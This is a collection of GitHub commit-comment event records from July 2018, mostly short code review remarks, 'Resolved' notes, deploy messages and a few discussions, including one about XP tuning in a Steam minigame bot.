{"id":"7906709916","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566719,"position":1,"line":56,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/DbConnection.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:34:11Z","updated_at":"2018-07-02T13:34:11Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:34:11Z"}
{"id":"7906714922","type":"CommitCommentEvent","actor":{"login":"ashi009"},"repo":{"name":"grpc/grpc-go"},"payload":{"comment":{"id":29566732,"position":12,"line":62,"path":"balancer/grpclb/grpclb.go","commit_id":"536e74e045bc4dbf4445506674d1573a6aa9dd56","created_at":"2018-07-02T13:35:00Z","updated_at":"2018-07-02T13:35:00Z","author_association":"NONE","body":"this should use `errors.New`, as there is nothing to format. "}},"created_at":"2018-07-02T13:35:00Z"}
{"id":"7906720735","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29566746,"position":null,"line":null,"path":null,"commit_id":"280e1c5536b2dce33558cd019d32bc9cefca05a6","created_at":"2018-07-02T13:36:01Z","updated_at":"2018-07-02T13:36:01Z","author_association":"OWNER","body":"another HEAD/post-patch target.  Can you post the first 25 lines of misc.h so I can look at it.  There are definitely some TERMS creation that require a target (again, should be post-extract anyway, not post-patch), but most do not.\r\n\r\nI'd like to go through existing license targets and either convert them to LICENSE_AWK or ensure they are post-extract targets too.  I think there are a few now that aren't conforming to (my) ideals."}},"created_at":"2018-07-02T13:36:01Z"}
{"id":"7906721081","type":"CommitCommentEvent","actor":{"login":"jim-collins"},"repo":{"name":"UKHomeOffice/booktravel_schema"},"payload":{"comment":{"id":29566749,"position":104,"line":162,"path":"travel-provider/TSP-40-SubmitTicketDetails/TSP-40-SubmitTicketDetails-Request.schema.json","commit_id":"17a13af69a8b293b88107ec1f2edf9227e259af2","created_at":"2018-07-02T13:36:05Z","updated_at":"2018-07-02T13:36:05Z","author_association":"NONE","body":"Should there be an IS_MIXED type?"}},"created_at":"2018-07-02T13:36:05Z"}
{"id":"7906721226","type":"CommitCommentEvent","actor":{"login":"dagar"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":29566750,"position":null,"line":null,"path":null,"commit_id":"3db287ba67917efd69d550a9240401f94587a845","created_at":"2018-07-02T13:36:06Z","updated_at":"2018-07-02T13:36:06Z","author_association":"MEMBER","body":"Yes, it looks like it. You'd rather it continue streaming identical data? Ideally we'd find some compromise where it could still stream at the higher max rate when actually changing quickly, but fall back to continuously streaming at a much lower rate. I'm interested in reducing link congestion.\r\n\r\nCan you open an issue and tag me?"}},"created_at":"2018-07-02T13:36:06Z"}
{"id":"7906721502","type":"CommitCommentEvent","actor":{"login":"cssgroupp"},"repo":{"name":"cssgroupp/test"},"payload":{"comment":{"id":29566755,"position":null,"line":null,"path":null,"commit_id":"7b81dd80b0ec553d94a728c4f855ef88edbf2181","created_at":"2018-07-02T13:36:09Z","updated_at":"2018-07-02T13:36:09Z","author_association":"OWNER","body":"кецеце"}},"created_at":"2018-07-02T13:36:09Z"}
{"id":"7906722159","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566761,"position":1,"line":95,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/DbRecordValuesList.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:36:16Z","updated_at":"2018-07-02T13:36:16Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:36:16Z"}
{"id":"7906724087","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566766,"position":1,"line":129,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/DbUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:36:36Z","updated_at":"2018-07-02T13:36:36Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:36:36Z"}
{"id":"7906725435","type":"CommitCommentEvent","actor":{"login":"ankillashiva123"},"repo":{"name":"ankillashiva123/students-attendance-monitor-web"},"payload":{"comment":{"id":29566769,"position":null,"line":null,"path":null,"commit_id":"db1dd7f22a57d86334b7a8e65bf097a72861f885","created_at":"2018-07-02T13:36:50Z","updated_at":"2018-07-02T13:36:50Z","author_association":"OWNER","body":"deploy"}},"created_at":"2018-07-02T13:36:50Z"}
{"id":"7906726757","type":"CommitCommentEvent","actor":{"login":"ankillashiva123"},"repo":{"name":"ankillashiva123/students-attendance-monitor-web"},"payload":{"comment":{"id":29566773,"position":null,"line":null,"path":null,"commit_id":"db1dd7f22a57d86334b7a8e65bf097a72861f885","created_at":"2018-07-02T13:37:03Z","updated_at":"2018-07-02T13:37:03Z","author_association":"OWNER","body":"deploy"}},"created_at":"2018-07-02T13:37:03Z"}
{"id":"7906727397","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566776,"position":1,"line":20,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/cassandra/DbConnCassandra.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:37:10Z","updated_at":"2018-07-02T13:37:10Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:37:10Z"}
{"id":"7906728003","type":"CommitCommentEvent","actor":{"login":"ankillashiva123"},"repo":{"name":"ankillashiva123/students-attendance-monitor-web"},"payload":{"comment":{"id":29566780,"position":null,"line":null,"path":null,"commit_id":"db1dd7f22a57d86334b7a8e65bf097a72861f885","created_at":"2018-07-02T13:37:16Z","updated_at":"2018-07-02T13:37:16Z","author_association":"OWNER","body":"deploy"}},"created_at":"2018-07-02T13:37:16Z"}
{"id":"7906729656","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29566784,"position":null,"line":null,"path":null,"commit_id":"477fbeb4f3154e7b546444613c7b3374c8d534b5","created_at":"2018-07-02T13:37:34Z","updated_at":"2018-07-02T13:37:34Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-133733 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-133733\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-02T13:37:34Z"}
{"id":"7906729745","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566785,"position":1,"line":72,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/mssql/DbConnSQLServer.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:37:35Z","updated_at":"2018-07-02T13:37:35Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:37:35Z"}
{"id":"7906730899","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"jypark0407/TIL"},"payload":{"comment":{"id":29566788,"position":26,"line":22,"path":"20180702.md","commit_id":"de73aa799daf2fcab6e80d7373370563a965e687","created_at":"2018-07-02T13:37:47Z","updated_at":"2018-07-02T13:37:47Z","author_association":"NONE","body":"statistics는 통계학이기도 하고 통계량들(복수형)이기도 합니다 😄 "}},"created_at":"2018-07-02T13:37:47Z"}
{"id":"7906731224","type":"CommitCommentEvent","actor":{"login":"jannes-m"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29566789,"position":null,"line":null,"path":null,"commit_id":"76fbba231e740d247071deda13ee311b568dc57a","created_at":"2018-07-02T13:37:50Z","updated_at":"2018-07-02T13:37:50Z","author_association":"COLLABORATOR","body":"1. Ok, perfect, but then we should say so also in the text. I think it's also worth mentioning that gpkg is able to store raster data which is a big advantage. And ok, sf cannot write raster to gpkg, but maybe raster can and if not, we can do so via the commandline (-> reference to c9 subsection GDAL)\r\n3. yep, I know, hard to define, still, I would be careful with the wording. And more importantly, other open vector data formats might have even more limitations than shp.\r\n4. Sorry, I meant `rgdal::gdalDrivers()`. GDAL supports 155 vector and 95 raster drivers (see http://www.gdal.org/), so in total 250 at the moment."}},"created_at":"2018-07-02T13:37:50Z"}
{"id":"7906734318","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566797,"position":1,"line":195,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/mssql/MssqlDbProvider.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:38:22Z","updated_at":"2018-07-02T13:38:22Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:38:22Z"}
{"id":"7906738256","type":"CommitCommentEvent","actor":{"login":"utk-spartan"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566809,"position":6,"line":57,"path":"app/Http/Controllers/PincodeController.php","commit_id":"4b0be23c71617c5c7e1bc19b551b3c14c11d1782","created_at":"2018-07-02T13:39:03Z","updated_at":"2018-07-02T13:39:03Z","author_association":"OWNER","body":"size validates for exact match\r\n\r\nYou are right size validation isn't required i will remove it."}},"created_at":"2018-07-02T13:39:03Z"}
{"id":"7906738332","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29566810,"position":53,"line":53,"path":"jyw7664/20180702프로그래밍기초&맛보기.md","commit_id":"9fecdbc80a41b18887d8b8abd49979337e003cad","created_at":"2018-07-02T13:39:04Z","updated_at":"2018-07-02T13:39:04Z","author_association":"CONTRIBUTOR","body":"😭 "}},"created_at":"2018-07-02T13:39:04Z"}
{"id":"7906743837","type":"CommitCommentEvent","actor":{"login":"Bcrichster"},"repo":{"name":"TwrpBuilder/android_device_motorola_owens"},"payload":{"comment":{"id":29566822,"position":null,"line":null,"path":null,"commit_id":"d945eec71875e549e1d0f8fb9208cb01b1ed723e","created_at":"2018-07-02T13:40:01Z","updated_at":"2018-07-02T13:40:01Z","author_association":"NONE","body":"You guys are doing a wonderful thing here, serious props to you all and Well Done!"}},"created_at":"2018-07-02T13:40:01Z"}
{"id":"7906753899","type":"CommitCommentEvent","actor":{"login":"daniel-thompson"},"repo":{"name":"96boards/documentation"},"payload":{"comment":{"id":29566843,"position":17,"line":24,"path":"consumer/rock960/downloads/README.md","commit_id":"de9152834214b8c4cbe70ce9503b0674b1028043","created_at":"2018-07-02T13:41:44Z","updated_at":"2018-07-02T13:41:44Z","author_association":"CONTRIBUTOR","body":"Why are we linking to AOSP for rock960? AOSP doesn't support rock960.\r\n\r\nWouldn't https://www.96boards.org/documentation/consumer/rock960/build/aosp.md.html be more useful to users?"}},"created_at":"2018-07-02T13:41:44Z"}
{"id":"7906756646","type":"CommitCommentEvent","actor":{"login":"bgoodri"},"repo":{"name":"stan-dev/stan"},"payload":{"comment":{"id":29566848,"position":null,"line":null,"path":null,"commit_id":"083b9e09459263785150da3c33dd5b1867f7eeb4","created_at":"2018-07-02T13:42:14Z","updated_at":"2018-07-02T13:42:14Z","author_association":"CONTRIBUTOR","body":"sure"}},"created_at":"2018-07-02T13:42:14Z"}
{"id":"7906761113","type":"CommitCommentEvent","actor":{"login":"ankillashiva123"},"repo":{"name":"ankillashiva123/students-attendance-monitor-web"},"payload":{"comment":{"id":29566858,"position":null,"line":null,"path":null,"commit_id":"db1dd7f22a57d86334b7a8e65bf097a72861f885","created_at":"2018-07-02T13:42:52Z","updated_at":"2018-07-02T13:42:52Z","author_association":"OWNER","body":"final deploy"}},"created_at":"2018-07-02T13:42:52Z"}
{"id":"7906767871","type":"CommitCommentEvent","actor":{"login":"TheSentry"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29566873,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T13:44:00Z","updated_at":"2018-07-02T13:44:00Z","author_association":"NONE","body":"What is the rationale for setting the damage so low?"}},"created_at":"2018-07-02T13:44:00Z"}
{"id":"7906773309","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29566887,"position":null,"line":null,"path":null,"commit_id":"2d433dd5e4cb8afff2c631a3cce25d466cda2037","created_at":"2018-07-02T13:44:55Z","updated_at":"2018-07-02T13:44:55Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=10)"}},"created_at":"2018-07-02T13:44:55Z"}
{"id":"7906773385","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29566888,"position":null,"line":null,"path":null,"commit_id":"2d01a381903e464d08d7970a00b611bed651f479","created_at":"2018-07-02T13:44:56Z","updated_at":"2018-07-02T13:44:56Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=10)"}},"created_at":"2018-07-02T13:44:56Z"}
{"id":"7906773448","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29566889,"position":null,"line":null,"path":null,"commit_id":"158ad2caeb3e9fe487ee9a6e7d2049396d716318","created_at":"2018-07-02T13:44:56Z","updated_at":"2018-07-02T13:44:56Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=10)"}},"created_at":"2018-07-02T13:44:56Z"}
{"id":"7906773906","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29566892,"position":9,"line":9,"path":"compiler/testData/codegen/box/reflection/functions/enumValuesValueOf.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T13:45:01Z","updated_at":"2018-07-02T13:45:01Z","author_association":"MEMBER","body":"Which setter? Are there any `var`s in built-ins?"}},"created_at":"2018-07-02T13:45:01Z"}
{"id":"7906774424","type":"CommitCommentEvent","actor":{"login":"m3Lith"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29566895,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T13:45:06Z","updated_at":"2018-07-02T13:45:06Z","author_association":"NONE","body":"Quest to find out how various values affect XP gains."}},"created_at":"2018-07-02T13:45:06Z"}
{"id":"7906777378","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/jungol"},"payload":{"comment":{"id":29566902,"position":64,"line":64,"path":"1615.c","commit_id":"aad553317db0e43bbe1bbd88890279eebc262e16","created_at":"2018-07-02T13:45:35Z","updated_at":"2018-07-02T13:45:35Z","author_association":"OWNER","body":"디버깅할때 여기서 에러 나오던데..."}},"created_at":"2018-07-02T13:45:35Z"}
{"id":"7906779268","type":"CommitCommentEvent","actor":{"login":"dfmcvn"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29566904,"position":null,"line":null,"path":null,"commit_id":"18e3335975e801ec617713b8d1539c27137b1b12","created_at":"2018-07-02T13:45:53Z","updated_at":"2018-07-02T13:45:53Z","author_association":"NONE","body":"\"Sad!\""}},"created_at":"2018-07-02T13:45:53Z"}
{"id":"7906784362","type":"CommitCommentEvent","actor":{"login":"QiWang-92"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29566909,"position":null,"line":null,"path":null,"commit_id":"3c0b748069498bf88e2d9ce4c55ffb7621383297","created_at":"2018-07-02T13:46:43Z","updated_at":"2018-07-02T13:46:43Z","author_association":"NONE","body":"Seems like they just add number of players in the boss zone to the time score? "}},"created_at":"2018-07-02T13:46:43Z"}
{"id":"7906786260","type":"CommitCommentEvent","actor":{"login":"YaShield"},"repo":{"name":"llSourcell/Social_Media_for_Developers"},"payload":{"comment":{"id":29566917,"position":null,"line":null,"path":null,"commit_id":"238e0eebb01a84043022a148067bc2bd1f2687a7","created_at":"2018-07-02T13:47:03Z","updated_at":"2018-07-02T13:47:03Z","author_association":"NONE","body":"Hi Siraj. I watch your videos on you-tube and I am learning about machine learning and deep learning as you mentioned before. Please let me know which topics will be more beneficial for me as a student of Computer Science.\r\nThank you.\r\n https://github.com/YaShield/Java-Programming-1"}},"created_at":"2018-07-02T13:47:03Z"}
{"id":"7906791129","type":"CommitCommentEvent","actor":{"login":"dollypreethi"},"repo":{"name":"dollypreethi/ansible"},"payload":{"comment":{"id":29566925,"position":null,"line":null,"path":null,"commit_id":"f13add76708f99df1d3344e4cbe29c341cef3741","created_at":"2018-07-02T13:47:52Z","updated_at":"2018-07-02T13:47:52Z","author_association":"OWNER","body":"Initial commit"}},"created_at":"2018-07-02T13:47:52Z"}
{"id":"7906792498","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566926,"position":1,"line":20,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/mysql/DbConnMySQL.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:48:07Z","updated_at":"2018-07-02T13:48:07Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:48:07Z"}
{"id":"7906794794","type":"CommitCommentEvent","actor":{"login":"Jazun713"},"repo":{"name":"DallasLewis1996/processCheck"},"payload":{"comment":{"id":29566929,"position":null,"line":null,"path":null,"commit_id":"ee9562c2bea9e9af6b294e7942e77a80e6bf913c","created_at":"2018-07-02T13:48:29Z","updated_at":"2018-07-02T13:48:29Z","author_association":"NONE","body":"This looks ok.  Although, I left sys in there and it doesn't appear we're using it."}},"created_at":"2018-07-02T13:48:29Z"}
{"id":"7906795991","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566935,"position":1,"line":123,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/mysql/MysqlDbProvider.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:48:42Z","updated_at":"2018-07-02T13:48:42Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:48:42Z"}
{"id":"7906799876","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566941,"position":1,"line":114,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/oracle/DbConnOracle.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:49:22Z","updated_at":"2018-07-02T13:49:22Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:49:22Z"}
{"id":"7906802194","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566948,"position":1,"line":36,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/oracle/OracleDbProvider.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:49:47Z","updated_at":"2018-07-02T13:49:47Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:49:47Z"}
{"id":"7906803642","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29566952,"position":null,"line":null,"path":null,"commit_id":"3bb308845fd262718f58465d6a0fc82049e33fbc","created_at":"2018-07-02T13:50:02Z","updated_at":"2018-07-02T13:50:02Z","author_association":"CONTRIBUTOR","body":"@Khrin remove https://github.com/easylist/easylist/commit/d26e645646ab9855cfe4f81ab20ba6eca56391c0"}},"created_at":"2018-07-02T13:50:02Z"}
{"id":"7906810835","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"yaml/pyyaml"},"payload":{"comment":{"id":29566970,"position":7,"line":27,"path":".travis.yml","commit_id":"a9c28e0b521967f5330f0316edd90a57f99cdd32","created_at":"2018-07-02T13:51:13Z","updated_at":"2018-07-02T13:51:13Z","author_association":"NONE","body":"It's better to have separate commands."}},"created_at":"2018-07-02T13:51:13Z"}
{"id":"7906812344","type":"CommitCommentEvent","actor":{"login":"EvgenKo423"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29566973,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T13:51:27Z","updated_at":"2018-07-02T13:51:27Z","author_association":"NONE","body":"Because you gain XP for time you fight and after increasing it XP gain from bosses reduced by times."}},"created_at":"2018-07-02T13:51:27Z"}
{"id":"7906812376","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566974,"position":1,"line":32,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/postgresql/DbConnPostgreSQL.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:51:27Z","updated_at":"2018-07-02T13:51:27Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:51:27Z"}
{"id":"7906815930","type":"CommitCommentEvent","actor":{"login":"sskaug"},"repo":{"name":"bitdump/BLHeli"},"payload":{"comment":{"id":29566983,"position":null,"line":null,"path":null,"commit_id":"39e799578e23b8c8a4cb47e9a1e4c1243c53326d","created_at":"2018-07-02T13:52:03Z","updated_at":"2018-07-02T13:52:03Z","author_association":"COLLABORATOR","body":"Now corrected"}},"created_at":"2018-07-02T13:52:03Z"}
{"id":"7906816187","type":"CommitCommentEvent","actor":{"login":"kemanik"},"repo":{"name":"CISecurity/OVALRepo"},"payload":{"comment":{"id":29566985,"position":null,"line":null,"path":null,"commit_id":"69e42504a839f55fd930b8d26970db5bcd0eadfc","created_at":"2018-07-02T13:52:06Z","updated_at":"2018-07-02T13:52:06Z","author_association":"CONTRIBUTOR","body":"@wmunyan There are several problems in this pull request. For example this objects have test namespace s oval_org.cisecurity_tst_751, oval_org.cisecurity_tst_7510. I think it will be better to recheck all."}},"created_at":"2018-07-02T13:52:06Z"}
{"id":"7906819076","type":"CommitCommentEvent","actor":{"login":"QiWang-92"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29566989,"position":null,"line":null,"path":null,"commit_id":"4415d1b6fc79420678ae6baed49840cc33c4ca60","created_at":"2018-07-02T13:52:34Z","updated_at":"2018-07-02T13:52:34Z","author_association":"NONE","body":"Seems like they just add number of players in the boss zone to the time score, so reduce the damage could gain more time score"}},"created_at":"2018-07-02T13:52:34Z"}
{"id":"7906825239","type":"CommitCommentEvent","actor":{"login":"sopwerdna"},"repo":{"name":"sopwerdna/ceph"},"payload":{"comment":{"id":29567001,"position":14,"line":63,"path":"src/librbd/cache/PrefetchImageCache.cc","commit_id":"497f000836906b234a63a20c2d579f216345b29b","created_at":"2018-07-02T13:53:33Z","updated_at":"2018-07-02T13:53:33Z","author_association":"OWNER","body":"I really have no idea what's going on here. Your code doesn't create this variable anywhere, so I don't know what it's supposed to be. The name implies it's one entry in the cache, so I don't know why you're trying to loop over it. Some explanation would be appreciated."}},"created_at":"2018-07-02T13:53:33Z"}
{"id":"7906836605","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567027,"position":1,"line":1,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/postgresql/PostgreSqlProvider.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:55:27Z","updated_at":"2018-07-02T13:55:27Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:55:27Z"}
{"id":"7906842149","type":"CommitCommentEvent","actor":{"login":"wmunyan"},"repo":{"name":"CISecurity/OVALRepo"},"payload":{"comment":{"id":29567035,"position":null,"line":null,"path":null,"commit_id":"69e42504a839f55fd930b8d26970db5bcd0eadfc","created_at":"2018-07-02T13:56:21Z","updated_at":"2018-07-02T13:56:21Z","author_association":"CONTRIBUTOR","body":"@kemanik Agreed.  We are taking a look at this today.  Thanks for the comment, we'll resolve this ASAP.\r\n\r\nCheers, \r\n-Bill M.\r\n"}},"created_at":"2018-07-02T13:56:21Z"}
{"id":"7906843423","type":"CommitCommentEvent","actor":{"login":"ericniebler"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29567038,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T13:56:34Z","updated_at":"2018-07-02T13:56:34Z","author_association":"NONE","body":"My latest project [pushmi](https://github.com/facebookresearch/pushmi) has a concepts emulation layer where `Foo<T> && Bar<U>` evaluates everything eagerly, but `defer::Foo<T> && defer::Bar<U>` builds an expression template and does short-circuiting. Works very well for this sort of thing."}},"created_at":"2018-07-02T13:56:34Z"}
{"id":"7906843981","type":"CommitCommentEvent","actor":{"login":"strumet"},"repo":{"name":"strumet/strumet.github.io"},"payload":{"comment":{"id":29567040,"position":null,"line":null,"path":null,"commit_id":"7935b52c88967e4c493a3923d17a1fb2068365c4","created_at":"2018-07-02T13:56:41Z","updated_at":"2018-07-02T13:56:41Z","author_association":"OWNER","body":"Ciao Francesca,\r\nl'esercizio sulla grafica vettoriale EX06 presenta, oltre a quelli previsti, anche tutti gli elementi richiesti negli esercizi successivi. Rimuovili per ripristinare la corretta progressione degli esercizi.\r\nmf"}},"created_at":"2018-07-02T13:56:41Z"}
{"id":"7906844750","type":"CommitCommentEvent","actor":{"login":"hydraclaw"},"repo":{"name":"hydraclaw/hydraclaw.github.io"},"payload":{"comment":{"id":29567043,"position":null,"line":null,"path":null,"commit_id":"5ee6ccdb14039444aab702bfd8da2a5597b2b4d1","created_at":"2018-07-02T13:56:48Z","updated_at":"2018-07-02T13:56:48Z","author_association":"OWNER","body":"Re"}},"created_at":"2018-07-02T13:56:48Z"}
{"id":"7906847056","type":"CommitCommentEvent","actor":{"login":"jim-collins"},"repo":{"name":"UKHomeOffice/booktravel_schema"},"payload":{"comment":{"id":29567053,"position":308,"line":320,"path":"travel-provider/TSP-40-SubmitTicketDetails/TSP-40-SubmitTicketDetails-Request.schema.json","commit_id":"17a13af69a8b293b88107ec1f2edf9227e259af2","created_at":"2018-07-02T13:57:13Z","updated_at":"2018-07-02T13:57:13Z","author_association":"NONE","body":"pattern looks wrong"}},"created_at":"2018-07-02T13:57:13Z"}
{"id":"7906849845","type":"CommitCommentEvent","actor":{"login":"zeroZshadow"},"repo":{"name":"spatialos/UnityGDK"},"payload":{"comment":{"id":29567062,"position":5,"line":6,"path":"workers/unity/ProjectSettings/UnityConnectSettings.asset","commit_id":"ad3864ac04f2d54ad8092665b6e554ef57ab6edd","created_at":"2018-07-02T13:57:40Z","updated_at":"2018-07-02T13:57:40Z","author_association":"CONTRIBUTOR","body":"?"}},"created_at":"2018-07-02T13:57:40Z"}
{"id":"7906856339","type":"CommitCommentEvent","actor":{"login":"Feldupt"},"repo":{"name":"Feldupt/pronostic"},"payload":{"comment":{"id":29567075,"position":null,"line":null,"path":null,"commit_id":"e8bbcb6fe6c9ace910b6d94e01b2a74de989184b","created_at":"2018-07-02T13:58:47Z","updated_at":"2018-07-02T13:58:47Z","author_association":"OWNER","body":"Bof"}},"created_at":"2018-07-02T13:58:47Z"}
{"id":"7906856831","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29567076,"position":37,"line":37,"path":"NET.S.2018.YACHNIK.03/PowNewtonMethod/FindingNRoot/RootNDegree.cs","commit_id":"66971dfe2ef0af92deffdd53c637cfd1a655ffc5","created_at":"2018-07-02T13:58:52Z","updated_at":"2018-07-02T13:58:52Z","author_association":"NONE","body":"Половина метода - ок. Вторая половина - совершенна непонятно зачем. Нужно вернуть то значение приближения, которое даст выход из цикла"}},"created_at":"2018-07-02T13:58:52Z"}
{"id":"7906857263","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567077,"position":245,"line":2817,"path":"corelibrary/src/main/java/com/axway/ats/core/filesystem/LocalFileSystemOperations.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:58:57Z","updated_at":"2018-07-02T13:58:57Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:58:57Z"}
